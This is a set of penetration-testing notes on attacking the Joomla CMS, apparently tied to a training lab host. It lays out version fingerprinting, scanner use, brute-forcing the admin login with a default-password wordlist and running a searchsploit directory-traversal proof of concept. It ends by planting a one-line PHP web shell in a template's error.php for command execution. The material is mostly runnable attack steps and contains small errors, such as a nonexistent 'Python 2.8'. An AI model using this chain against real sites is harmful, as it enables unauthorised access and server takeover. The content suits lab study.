Joomla

Joomla, released in August 2005 is another free and open-source CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more. It is written in PHP and uses MySQL in the backend. Like WordPress, Joomla can be enhanced with over 7,000 extensions and over 1,000 templates. There are up to 2.5 million sites on the internet running Joomla. Here are some interesting statistics about Joomla:

Joomla accounts for 3.5% of the CMS market share
Joomla is 100% free and means "all together" in Swahili (phonetic spelling of "Jumla")
The Joomla community has close to 700,000 in its online forums
Joomla powers 3% of all websites on the internet, nearly 25,000 of the top 1 million sites worldwide (just 10% of the reach of WordPress)
Some notable organizations that use Joomla include eBay, Yamaha, Harvard University, and the UK government
Over the years, 770 different developers have contributed to Joomla

Joomla collects some anonymous usage statistics such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.

Querying this API, we can see over 2.7 million Joomla installs!

        
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

Enumeration (manually)

Identify Joomla

curl -s http://dev.inlanefreight.local/ | grep Joomla

Fingerprint Joomla version

curl -s http://dev.inlanefreight.local/README.txt | head -n 5
fingerprint the version from JavaScript files in the media/system/js/ directory or by browsing to administrator/manifests/files/joomla.xml
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

Enumeration & Attacks using automated tools

Droopescan:

sudo pip3 install droopescan
droopescan scan joomla --url http://dev.inlanefreight.local/

Joompla scan:

Python 2.8 Installation:

#Requires python 2.8:
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7

pyenv shell 2.7

python2.7 -m pip install urllib3
python2.7 -m pip install certifi
python2.7 -m pip install bs4

Tool usage:

python2.7 joomlascan.py -u http://dev.inlanefreight.local

git clone https://github.com/ajnik/joomla-bruteforce.git

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

After loggin in on the Joomla application, if you receive an error stating "An error has occurred. Call to a member function format() on null" after logging in, navigate to "http://dev.inlanefreight.local/administrator/index.php?option=com_plugins" and disable the "Quick Icon - PHP Version Check" plugin. This will allow the control panel to display properly.

Search for known exploits based on the version identified with searchsploit:

#search for a known exploit 
searchsploit joomla 3.0

#copy the poc to home folder
searchsploit -m 4578

#run the script as shown in the following example
ython2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir

Once we have Admin access on the Joomla application, e can upload a PHP code that will allow us to execute code on the system.

Select Tempaltes=⇒ Configuration
Choose a Template to modify (e.g. Protostar)
Should bring you to Templates:Customise Page
Click on a page to pull up the page source and upload the following PHP code to error.php for example


# Use non-standard file names and parameters for our web shells to not make 
## them easily accessible to a "drive-by" attacker during the assessment
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

PreviousWordpress NextDrupal

Last updated 1 month ago

Enumeration (manually)

Identify Joomla

Fingerprint Joomla version

Enumeration & Attacks using automated tools

Bruteforce Joomla login credentials